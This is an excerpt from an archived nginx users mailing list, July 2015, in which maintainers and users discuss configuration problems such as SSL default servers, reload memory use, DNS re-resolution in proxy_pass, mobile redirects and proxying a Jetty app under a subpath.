requests with protocol upgrade. To proxy arbitrary stream sockets, use the stream module. See here for details: http://nginx.org/en/docs/stream/ngx_stream_core_module.html Note that it's only available in nginx 1.9.x. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Sat Jul 4 05:48:22 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 08:48:22 +0300 Subject: trac.nginx.org incorrect https In-Reply-To: References: Message-ID: <20150704054822.GE74913@mdounin.ru> Hello! On Thu, Jun 25, 2015 at 06:16:42PM +0900, Edho Arief wrote: > I noticed that trac.nginx.org has https/SNI configured for the host > but no actual ssl configuration (how do you even do that): The trac.nginx.org domain isn't available via https. The IP address trac.nginx.org maps to does have other sites answering on https/SNI though, and to avoid sending invalid certificate the "ssl_ciphers aNULL;" is used in the default server configuration. This is what causes the message you see. > $ openssl s_client -connect trac.nginx.org:443 -servername trac.nginx.org > CONNECTED(00000003) > 140010415498912:error:14077410:SSL > routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake > failure:s23_clnt.c:770: > --- > no peer certificate available > --- > No client certificate CA names sent > --- > SSL handshake has read 7 bytes and written 318 bytes > --- > New, (NONE), Cipher is (NONE) > Secure Renegotiation IS NOT supported > Compression: NONE > Expansion: NONE > --- JFYI: You can use something like $ openssl s_client -connect trac.nginx.org:443 -servername trac.nginx.org -cipher aNULL to establish a connection. (Requests won't work though, as the same server also have "return 444;" in the configuration.) > Relevant (which is how I noticed it in the first place): > > https://github.com/EFForg/https-everywhere/pull/1993 When people try to use something they weren't asked to, it strikes back. -- Maxim Dounin http://nginx.org/ From me at myconan.net Sat Jul 4 05:57:44 2015 From: me at myconan.net (Edho Arief) Date: Sat, 4 Jul 2015 14:57:44 +0900 Subject: trac.nginx.org incorrect https In-Reply-To: <20150704054822.GE74913@mdounin.ru> References: <20150704054822.GE74913@mdounin.ru> Message-ID: On Sat, Jul 4, 2015 at 2:48 PM, Maxim Dounin wrote: > Hello! > > On Thu, Jun 25, 2015 at 06:16:42PM +0900, Edho Arief wrote: > >> I noticed that trac.nginx.org has https/SNI configured for the host >> but no actual ssl configuration (how do you even do that): > > The trac.nginx.org domain isn't available via https. > > The IP address trac.nginx.org maps to does have other sites > answering on https/SNI though, and to avoid sending invalid > certificate the "ssl_ciphers aNULL;" is used in the default server > configuration. This is what causes the message you see. > > >> Relevant (which is how I noticed it in the first place): >> >> https://github.com/EFForg/https-everywhere/pull/1993 > > When people try to use something they weren't asked to, it > strikes back. > Whoever added it probably didn't actually try accessing the site. It has been removed. Thanks. From mdounin at mdounin.ru Sat Jul 4 06:04:51 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 09:04:51 +0300 Subject: High load due to reload In-Reply-To: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> References: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> Message-ID: <20150704060451.GF74913@mdounin.ru> Hello! On Tue, Jun 23, 2015 at 11:14:44AM +0200, 5hosting GmbH wrote: > I have a small problem with a nginx system that acts as a loadbalancing > proxy. We do have lots of vhosts and ssl certificates and each time we do a > /etc/init.d/nginx reload, the load of our server goes up to 20 due to > swapping. > > Is there any other way to reload nginx to get aware of ssl or vhost changes > without getting high loads? When reloading a configuration, nginx reads a new configuration and starts new worker process, and then asks old worker processes to terminate gracefully. See this link for a detailed description: http://nginx.org/en/docs/control.html#reconfiguration This basically means that during configuration reload nginx memory consumption grows up for a while (and roughly doubles in some cases). You should tune your system appropriately to make sure there are enough memory to start new worker processes without swapping. In particular, if most of the memory is used for nginx buffers (proxy_buffers, proxy_buffer_size, and so on), tuning these buffers usually is enough. -- Maxim Dounin http://nginx.org/ From shay at peretz.in Sat Jul 4 06:42:06 2015 From: shay at peretz.in (Shay Peretz) Date: Sat, 4 Jul 2015 09:42:06 +0300 Subject: DNS cache in nginx Message-ID: Hello , I have an A record which resolve to 2 CNAME's , the DNS failover will make the switch if something go wrong . The problem is that after a change the nginx stick to the OLD IP unless I reload it .. any way the Caching can be disabled ? I tried the following with no success : add valid for the resolver , resolver 8.8.8.8 valid=5s; and or resolver_timeout 1s; Any recommendation to solve it ? -- shay From mdounin at mdounin.ru Sat Jul 4 06:47:07 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 09:47:07 +0300 Subject: SSL on/off on same port and IP In-Reply-To: <5589708B.9020607@der-ingo.de> References: <5589708B.9020607@der-ingo.de> Message-ID: <20150704064707.GG74913@mdounin.ru> Hello! On Tue, Jun 23, 2015 at 04:43:23PM +0200, Ingo Lafrenz wrote: > Hi, > > consider the following very simple nginx config: > http { > server { > listen 127.0.0.1:123; > server_name abc; > } > server { > listen 127.0.0.1:123 ssl; > server_name xyz; > ssl_certificate...; > } > } > > In words: > I instruct nginx to listen on the same port and IP, one time without ssl, > one time with ssl. IMHO this is a broken config, however nginx accepts it. > > What would you say? Should nginx reject such a config? Right now you only > get an error at request time. The "listen 127.0.0.1:123 ssl;" means that nginx will use SSL on the 127.0.0.1:123 listen socket. This works much like with any listen socket options: you may specify them once, and omit in other server{} blocks. The only problem with the config in question is that there is no ssl certificate defined in the first server. There is a ticket about complaining during configuration testing in such a case: http://trac.nginx.org/nginx/ticket/178 But adding such a check isn't trivial and unlikely to happen soon. > It gets even worse, if the 2nd server is configured with the ssl directive > instead of "listen ssl": > server { > listen 127.0.0.1:123; > server_name xyz; > ssl on; > ssl_certificate...; > } > > In that case you don't even see an error in the logs anymore and clients > can't connect via https anymore. There will be an error in the logs, but at the "info" level - and therefore rarely seen. The socket in question won't have SSL enabled as there is no "ssl on" in the default (first) server, and therefore nginx will not expect SSL connections and will complain that "client sent invalid method" for all attempts to establish an SSL connection. Anyway, that's why "ssl on" is deprecated - it's very easy to configure things wrongly when using it. -- Maxim Dounin http://nginx.org/ From francis at daoine.org Sat Jul 4 10:14:10 2015 From: francis at daoine.org (Francis Daly) Date: Sat, 4 Jul 2015 11:14:10 +0100 Subject: Nginx support fot Weedfs !! In-Reply-To: References: Message-ID: <20150704101410.GQ23844@daoine.org> On Thu, Jun 25, 2015 at 04:17:19AM +0500, shahzaib shahzaib wrote: Hi there, I've read your mail, and I am not sure what your planned architecture is -- as in, at what point do you want nginx to be used. > Currently, weedfs > default webserver is being used as HTTP but it would be better to have > nginx webserver on volume servers for its low foot prints, stability and > robust response time for static .jpg files. > > So we need to know if we can use nginx with weedFS ? If you want to replace the weed volume server (which exposes a http interface to clients) with the nginx http server, then you will probably need to reimplement whatever it is that the weed volume server does that nginx does not do. Or you could try to use nginx for some of what the weed volume server does, and implement some way of "passing off" the rest of what the weed volume server does, to the weed volume server. Either way, you'll probably need to arrange for code to be written. If you want the browser to make a request of nginx, and then have nginx fetch the content from the weedfs service, then you will need a weedfs client available within nginx. That should be doable, but will take some coding since it does not exist in stock nginx. > Following is the > github we found, but need to confirm if it will fulfill our needs ? > > https://github.com/medcl/lua-resty-weedfs That does not look like a complete weedfs client to me; but it may be enough for your needs, depending on what exactly your needs are. It shouldn't be too difficult to set up a small test to see that it does do what you want, at the speed you want. If you can describe your intended data flow -- starting with something like "the browser will get *this* url which has *this* content" -- then it may be clearer what you are trying to achieve. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Sat Jul 4 18:03:47 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Sat, 04 Jul 2015 14:03:47 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150703174730.GP23844@daoine.org> References: <20150703174730.GP23844@daoine.org> Message-ID: <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> Hi there thanks for the help i run the following : curl -A iPad -i http://www.domain.com/#!/pt/--item/pt/32516/Farinha and the result was : -bash: !/pt/--item/pt/32516/Farinha : event not found But this page exist's and is running in desktop in a pc Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260055#msg-260055 From nginx-forum at nginx.us Sat Jul 4 18:20:52 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Sat, 04 Jul 2015 14:20:52 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> References: <20150703174730.GP23844@daoine.org> <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7bff838604130226b01bf97d3c03d475.NginxMailingListEnglish@forum.nginx.org> Hi there thanks for the help there was an erro not "-bash: !/pt/--item/pt/32516/Farinha : event not found" but " -bash: "#!/pt/--item/pt/32516/Farinha : event not found Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260056#msg-260056 From francis at daoine.org Sat Jul 4 18:35:28 2015 From: francis at daoine.org (Francis Daly) Date: Sat, 4 Jul 2015 19:35:28 +0100 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> References: <20150703174730.GP23844@daoine.org> <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150704183528.GR23844@daoine.org> On Sat, Jul 04, 2015 at 02:03:47PM -0400, ramsoft75 wrote: Hi there, > i run the following : > > curl -A iPad -i http://www.domain.com/#!/pt/--item/pt/32516/Farinha > > and the result was : > > -bash: !/pt/--item/pt/32516/Farinha : event not found A few things here: "!" is special to bash, so you have to shell-escape it for "curl" to see it. "#" is special in a url; it is not part of the normalised variable $uri. Possibly using $request_uri instead of $uri in your configuration will be appropriate? They are different variables with different values, so there are probably some cases where using one will break things. Since you are using it in a redirect, probably $request_uri is the correct one to use regardless. f -- Francis Daly francis at daoine.org From philipp.kraus at tu-clausthal.de Sat Jul 4 18:38:06 2015 From: philipp.kraus at tu-clausthal.de (Philipp Kraus) Date: Sat, 4 Jul 2015 20:38:06 +0200 Subject: rewrite URL Message-ID: <917E4A5F-F4DD-4C0A-A9F4-903AA5D9405C@tu-clausthal.de> Hello, I try to use Nginx as a proxy (for SSL) on a Jetty server. The Jetty application should be accessed by a subdirectory of my Nginx. I have setup this location configuration: location /myapp { proxy_pass http://localhost:8112; proxy_set_header X-Forwarded-Host $http_host; proxy_set_header X-Forwarded-Proto $scheme; #proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; client_max_body_size 650M; } The Jetty server runs under http://localhost:8112, if I change the ?location /myapp? to ?location /? everything works fine. The Jetty server returns URLs with the base URL /, so on this configuration CSS / JSS files are not found. How can I rewrite the URLs, so that all files are found within the directory /myapp ? Thanks Phil From cnst++ at FreeBSD.org Sat Jul 4 18:53:31 2015 From: cnst++ at FreeBSD.org (Constantine A. Murenin) Date: Sat, 04 Jul 2015 11:53:31 -0700 Subject: rewrite URL In-Reply-To: <917E4A5F-F4DD-4C0A-A9F4-903AA5D9405C@tu-clausthal.de> References: <917E4A5F-F4DD-4C0A-A9F4-903AA5D9405C@tu-clausthal.de> Message-ID: <55982BAB.9070800@FreeBSD.org> On 2015-07-04 11:38, Philipp Kraus wrote: > Hello, > > I try to use Nginx as a proxy (for SSL) on a Jetty server. The Jetty application should be accessed by a subdirectory of my Nginx. I have setup this location configuration: > > location /myapp { > > proxy_pass http://localhost:8112; > > proxy_set_header X-Forwarded-Host $http_host; > proxy_set_header X-Forwarded-Proto $scheme; > #proxy_set_header X-Real-IP $remote_addr; > proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; > proxy_http_version 1.1; > proxy_set_header Upgrade $http_upgrade; > proxy_set_header Connection "upgrade"; > client_max_body_size 650M; > > } > > The Jetty server runs under http://localhost:8112, if I change the ?location /myapp? to ?location /? everything works fine. The Jetty server returns URLs with the base URL /, so on this configuration CSS / JSS files are not found. > How can I rewrite the URLs, so that all files are found within the directory /myapp ? > > Thanks > > Phil Hi Phil, You should specify a URI (e.g., a trailing slash) in the URL specified by the proxy_pass directive: > location /myapp { > > proxy_pass http://localhost:8112/; ... See http://nginx.org/r/proxy_pass for more info. Cheers, Constantine. From nginx-forum at nginx.us Sun Jul 5 19:31:22 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Sun, 05 Jul 2015 15:31:22 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150703174730.GP23844@daoine.org> References: <20150703174730.GP23844@daoine.org> Message-ID: <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> Hi there I changed to #to detect if the device with www entered in domain is mobile if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^ http://m.domain.com$request_uri; } I executed the command : $ curl -A iPad -i https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J And the result was : -bash: !/pt/--item-view/pt/32081/Mix-J: event not found This only append's with Safari, there's no problem with Chrome (Desktop, Mobile) or Internet Explorer in Pc, could this be a browser problem and not an Nginx configuration problem ? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260064#msg-260064 From nginx-forum at nginx.us Sun Jul 5 20:24:19 2015 From: nginx-forum at nginx.us (xfeep) Date: Sun, 05 Jul 2015 16:24:19 -0400 Subject: [ANN] Nginx-Clojure v0.4.0 Release! Message-ID: <690dccaf31f4ce67dc0a42182a10ca8d.NginxMailingListEnglish@forum.nginx.org> 0.4.0 (2015-07-06) New Feature: Server Side Websocket (issue #73) New Feature: A build-in Jersey container to support java standard RESTful web services (JAX-RS 2.0) (issue #74) New Feature: Tomcat 8 embedding support (so servlet 3.1/jsp/sendfile/JSR-356 websocket work within nginx!) (issue #67) New Feature: Coroutined Based Client Socket Supports to Bind to Specified IP Address (issue #69) New Feature: Handler's Property Configuration (issue #66) Enhancement: NginxHttpServerChannel can work with Rewrite Handler or Access Handler (issue #79) Enhancement: Configurable Write Buffer Size for SSE or Websocket (issue #76) Bug Fix: When we do not configure jvm_path proxy_pass will not work (issue #72) Bug Fix: nginx worker restart when get the value of header X-Forwarded-For (issue #70) Bug Fix: proxy_cache_path causes crash (issue #64) Bug Fix: send_timeout does not take effect with NginxHttpServerChannel (issue #78) Bug Fix: Waving tool generates wrong wave information of fuzzing classes (issue #80) Documents : Release History link in README (issue #68) Binaries Distribution: built with The latest stable Nginx v1.8.0 which released at 2015-04-21. Binaries of Releases (for linux, windows and macosx) http://sourceforge.net/projects/nginx-clojure/files/. Freebsd users can get old v0.3.0 from https://www.freshports.org/www/nginx . Sources of Releases https://github.com/nginx-clojure/nginx-clojure/releases website : http://nginx-clojure.github.io/ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260065,260065#msg-260065 From mdounin at mdounin.ru Sun Jul 5 23:43:26 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 6 Jul 2015 02:43:26 +0300 Subject: OCSP stapling for client certificates In-Reply-To: References: <20140827165554.GW1849@mdounin.ru> Message-ID: <20150705234326.GA1656@mdounin.ru> Hello! On Sun, Jun 28, 2015 at 12:20:06PM -0400, prozit wrote: > Actually, I had the same questions. > Is this something that's available by now, or is it in the pipeline of any > new release of Nginx or will it never be? > > I'm just asking since I believe this might be a good feature to add since > CRL's could get very big when lots of certificate have been revoked, and > since it is not a realtime updating mechanism. > > By using a OCSP, there is a little overhead of contacting the OCSP for > checking each client certificate that is being validated... > I believe this to be much more efficient than regularly > downloading/uploading a CRL and reloading Nginx. This process can fail on > multiple locations which makes it harder to track and a big disadvantage of > the CRL's is that they are not realtime updated, which is the case for > OCSP's. > This way revoking a certificate will cause it to immediately retract the > access to client certificate secured applications (for all new sessions). > > Is it already supported in some version of Nginx or is it planned somewhere > in the future? As of now, there are no plans to support OCSP-based validation of client certificates. -- Maxim Dounin http://nginx.org/ From office at 5hosting.com Mon Jul 6 06:45:53 2015 From: office at 5hosting.com (5hosting GmbH) Date: Mon, 6 Jul 2015 08:45:53 +0200 Subject: AW: High load due to reload In-Reply-To: <20150704060451.GF74913@mdounin.ru> References: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> <20150704060451.GF74913@mdounin.ru> Message-ID: <00cd01d0b7b7$67b68f20$3723ad60$@5hosting.com> Hi Maxim, thanks for your explanation. Is there a formula we can use to calculate the amount of RAM needed in a reload scenario? Thanks, J?rgen -----Urspr?ngliche Nachricht----- Von: nginx-bounces at nginx.org [mailto:nginx-bounces at nginx.org] Im Auftrag von Maxim Dounin Gesendet: Samstag, 04. Juli 2015 08:05 An: nginx at nginx.org Betreff: Re: High load due to reload Hello! On Tue, Jun 23, 2015 at 11:14:44AM +0200, 5hosting GmbH wrote: > I have a small problem with a nginx system that acts as a > loadbalancing proxy. We do have lots of vhosts and ssl certificates > and each time we do a /etc/init.d/nginx reload, the load of our server > goes up to 20 due to swapping. > > Is there any other way to reload nginx to get aware of ssl or vhost > changes without getting high loads? When reloading a configuration, nginx reads a new configuration and starts new worker process, and then asks old worker processes to terminate gracefully. See this link for a detailed description: http://nginx.org/en/docs/control.html#reconfiguration This basically means that during configuration reload nginx memory consumption grows up for a while (and roughly doubles in some cases). You should tune your system appropriately to make sure there are enough memory to start new worker processes without swapping. In particular, if most of the memory is used for nginx buffers (proxy_buffers, proxy_buffer_size, and so on), tuning these buffers usually is enough. -- Maxim Dounin http://nginx.org/ _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 6079 bytes Desc: not available URL: From Sebastian.Stabbert at heg.com Mon Jul 6 08:37:48 2015 From: Sebastian.Stabbert at heg.com (Sebastian Stabbert) Date: Mon, 6 Jul 2015 10:37:48 +0200 Subject: Debian Packages from nginx.org Message-ID: <837A38DF-515C-4F8D-A74A-8288D5D3C8B3@heg.com> Hey Guys, the Debian package for latest stable nginx contains a logrotate.d file with following contents: "create 640 nginx adm? However, the package does not create a user ?debian? and the user does not exist in Debian by default. Id say this is a bug - however Im not able to login to TRAC, I rather get a ?502? or a message telling me that google does not support OpenID2.0. How do you handle this issue, I think im not the only one running into it? Cheers, Sebastian -- Sebastian Stabbert Systemadministrator Host Europe GmbH is a company of HEG E-Mail: sebastian.stabbert at heg.com Telefon: +49 2203 1045-7362 ----------------------------------------------------------------------- Host Europe GmbH - http://www.hosteurope.de Welserstra?e 14 - 51149 K?ln - Germany HRB 28495 Amtsgericht K?ln Gesch?ftsf?hrer: Dr. Claus Boyens, Tobias Mohr -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 204 bytes Desc: Message signed with OpenPGP using GPGMail URL: From nginx-forum at nginx.us Mon Jul 6 08:52:51 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 04:52:51 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150703174730.GP23844@daoine.org> References: <20150703174730.GP23844@daoine.org> Message-ID: <184471beffdcce59ac0cd9ea7bc43792.NginxMailingListEnglish@forum.nginx.org> Good day There was a problem in testing in the terminal with the character "!", it should be with "\" after, like this : $ curl -A iPad -i http://www.domain.com/#\!/pt/--item-view/en/3190/Wok-Vintage And the result was : HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 06 Jul 2015 08:50:10 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: http://m.alpha.centroproduto.com/ 301 Moved Permanently

301 Moved Permanently


nginx
And in this case i changed the nginx configuration to : if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^/$ http://m.domain.com/$1 permanent; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260071#msg-260071 From sb at nginx.com Mon Jul 6 09:35:03 2015 From: sb at nginx.com (Sergey Budnevitch) Date: Mon, 6 Jul 2015 12:35:03 +0300 Subject: Debian Packages from nginx.org In-Reply-To: <837A38DF-515C-4F8D-A74A-8288D5D3C8B3@heg.com> References: <837A38DF-515C-4F8D-A74A-8288D5D3C8B3@heg.com> Message-ID: <0B6C784E-F5BA-480A-B7BA-A541173787E1@nginx.com> > On 06 Jul 2015, at 11:37, Sebastian Stabbert wrote: > > Hey Guys, > > the Debian package for latest stable nginx contains a logrotate.d file with following contents: > "create 640 nginx adm? Yes, nginx package creates user nginx, while arm is a system group. > > However, the package does not create a user ?debian? and the user does not exist in Debian by default. I do not see user debian in the nginx package, what are you talking about? > Id say this is a bug - however Im not able to login to TRAC, I rather get a ?502? or a message telling me that google does not support OpenID2.0. > > How do you handle this issue, I think im not the only one running into it? > > Cheers, > Sebastian > > -- > Sebastian Stabbert > Systemadministrator > > Host Europe GmbH is a company of HEG > > E-Mail: sebastian.stabbert at heg.com > Telefon: +49 2203 1045-7362 > > ----------------------------------------------------------------------- > Host Europe GmbH - http://www.hosteurope.de > Welserstra?e 14 - 51149 K?ln - Germany > HRB 28495 Amtsgericht K?ln > Gesch?ftsf?hrer: Dr. Claus Boyens, Tobias Mohr > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From francis at daoine.org Mon Jul 6 12:22:07 2015 From: francis at daoine.org (Francis Daly) Date: Mon, 6 Jul 2015 13:22:07 +0100 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> References: <20150703174730.GP23844@daoine.org> <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150706122207.GS23844@daoine.org> On Sun, Jul 05, 2015 at 03:31:22PM -0400, ramsoft75 wrote: Hi there > This only append's with Safari, there's no problem with Chrome (Desktop, > Mobile) or Internet Explorer in Pc, could this be a browser problem and not > an Nginx configuration problem ? For one request that gets the response you expect, what does access.log say that the request and user-agent are? For one request that does not get the response you expect, what does access.log say that the request and user-agent are? Perhaps that will hint at where the problem is. f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Mon Jul 6 12:36:45 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 6 Jul 2015 15:36:45 +0300 Subject: High load due to reload In-Reply-To: <00cd01d0b7b7$67b68f20$3723ad60$@5hosting.com> References: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> <20150704060451.GF74913@mdounin.ru> <00cd01d0b7b7$67b68f20$3723ad60$@5hosting.com> Message-ID: <20150706123645.GD1656@mdounin.ru> Hello! On Mon, Jul 06, 2015 at 08:45:53AM +0200, 5hosting GmbH wrote: > thanks for your explanation. Is there a formula we can use to calculate the > amount of RAM needed in a reload scenario? As previously suggested, nginx memory consumption during a reload may be doubled compared to normal operations - because there will be twice as much worker processes. Having at least the same amount of memory as normally occupied by nginx worker processes (excluding shared memory zones) in (free + inactive) is usually good enough to ensure seamless reloads. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Jul 6 13:01:49 2015 From: nginx-forum at nginx.us (snagytx) Date: Mon, 06 Jul 2015 09:01:49 -0400 Subject: websocket causes "client sent invalid method ..." In-Reply-To: <20150704052033.GD74913@mdounin.ru> References: <20150704052033.GD74913@mdounin.ru> Message-ID: <2588d760d015c9421baba5972839de8f.NginxMailingListEnglish@forum.nginx.org> Thank you. As a temporary solution I used port-forwarding at the firewall level, it doesn't do load balancing but I don't need it for now. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260007,260083#msg-260083 From nginx-forum at nginx.us Mon Jul 6 13:41:02 2015 From: nginx-forum at nginx.us (xnirchan) Date: Mon, 06 Jul 2015 09:41:02 -0400 Subject: stub_status newrelic plugin Message-ID: <4be687087c4bf083ffc65209339a26af.NginxMailingListEnglish@forum.nginx.org> Hello nginx experts, I wonder how nginx generate the server status by stub_status directive. I have set several virtual host on single server and I put the several nginx server behind load balancer. I have 2 questions: 1. does stub_status show difference results between virtual hosts in one server or actually this status report is for whole server, regardless its virtual host? 2. what if I put several server behind load balancer, is it still relevant to single server (shown randomly depend on load balancer) or they can be separated per server? Currently I am using newrelic plugin and the report seems separated, I am not pretty sure if this report is accurate to the respective server or it is just random report based on stub_status accessed by the agent. thank you for your time and answer. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260085,260085#msg-260085 From nginx-forum at nginx.us Mon Jul 6 13:49:35 2015 From: nginx-forum at nginx.us (sz_g) Date: Mon, 06 Jul 2015 09:49:35 -0400 Subject: proxy_cache_key with variables Message-ID: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> I've just created a configuration composed of two servers. Both just forwards traffic from different ports (and protocols) to different servers, and keep responses in cache. It works nice. For both servers "GET /" request is sent, in the response there is proper resource. Thus (to distinguish responses in the cache) I added for both cache_key: proxy_cache_key "$upstream_addr*$request"; But it doesn't work. I found that upstream states are not available and thus "proxied" address is not known when cache key is computed. And "proxied" address is computed only when additional stream must be used.. Is there any way to get proper key? Or any other way to keep all copies in the cache? I plan to add "load balancing" module, which would be able to forward request on (multiple) source addresses to multiple proxied addresses, with caching.. Will it work properly? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260086,260086#msg-260086 From nginx-forum at nginx.us Mon Jul 6 14:05:31 2015 From: nginx-forum at nginx.us (xnirchan) Date: Mon, 06 Jul 2015 10:05:31 -0400 Subject: proxy_cache_key with variables In-Reply-To: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> References: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, >>proxy_cache_key "$upstream_addr*$request"; I am not sure that you are using the correct format for proxy_cache_key directive. my I know what is the wildcard char "*" doing out there, between $upstream_addr and $request? refer to nginx directive example: proxy_cache_key "$host$request_uri $cookie_user"; or by default is proxy_cache_key $scheme$proxy_host$uri$is_args$args; >>I plan to add "load balancing" module, which would be able to forward request on (multiple) source addresses to multiple proxied addresses, with caching.. Will it work properly? if your nginx is acting as load balancer, I guess better add load balancing module. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260086,260088#msg-260088 From nginx-forum at nginx.us Mon Jul 6 14:10:29 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 10:10:29 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150706122207.GS23844@daoine.org> References: <20150706122207.GS23844@daoine.org> Message-ID: <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> Hi I tested in a iPad and Safari the request and the nginx log reported a 401 error : xxx.xxx.xxx.xxx - - [06/Jul/2015:13:42:24 +0000] "GET /pt/api_cp/user_counts/ HTTP/1.1" 401 27 "http://m.domain.com/" "Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4" But this i think is not an error associated with faulty url Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260091#msg-260091 From nginx-forum at nginx.us Mon Jul 6 14:11:47 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 10:11:47 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> I entered in a url an url similar to the tested before : http://www.domain.com/#\!/pt/--item-view/en/3190/Wok-Vintage And the Nginx didn't recorded the access in the nginx access.log file Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260092#msg-260092 From mdounin at mdounin.ru Mon Jul 6 14:30:03 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 6 Jul 2015 17:30:03 +0300 Subject: DNS cache in nginx In-Reply-To: References: Message-ID: <20150706143003.GG1656@mdounin.ru> Hello! On Sat, Jul 04, 2015 at 09:42:06AM +0300, Shay Peretz wrote: > Hello , > > I have an A record which resolve to 2 CNAME's , the DNS failover will > make the switch if something go wrong . > > The problem is that after a change the nginx stick to the OLD IP > unless I reload it .. > any way the Caching can be disabled ? > I tried the following with no success : > add valid for the resolver , > resolver 8.8.8.8 valid=5s; > and or > resolver_timeout 1s; > > Any recommendation to solve it ? As long as you write host names in nginx configuration, nginx will resolve these names while parsing the configuration. It won't notice any changes unless the configuration is reloaded. If you want nginx to periodically re-resolve names, there are two options available: 1) Use proxy_pass with variables: resolver 127.0.0.1; set $upstream "backend.example.com"; proxy_pass http://$upstream; When variables are used in the "proxy_pass" directive, nginx will resolve names at runtime. See http://nginx.org/r/proxy_pass for details. 2) Use the "resolve" flag in an upstream{} block. Only available in nginx plus, see http://nginx.org/en/docs/http/ngx_http_upstream_module.html#resolve for details. Alternatively, you may consider using nginx mechanisms to do failover instead. See these links for some details: http://nginx.org/en/docs/http/ngx_http_upstream_module.html http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_next_upstream -- Maxim Dounin http://nginx.org/ From arut at nginx.com Mon Jul 6 15:44:20 2015 From: arut at nginx.com (Roman Arutyunyan) Date: Mon, 6 Jul 2015 18:44:20 +0300 Subject: proxy_cache_key with variables In-Reply-To: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> References: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> Message-ID: <5285AE78-036C-4160-817A-E5334B035E1B@nginx.com> > On 06 Jul 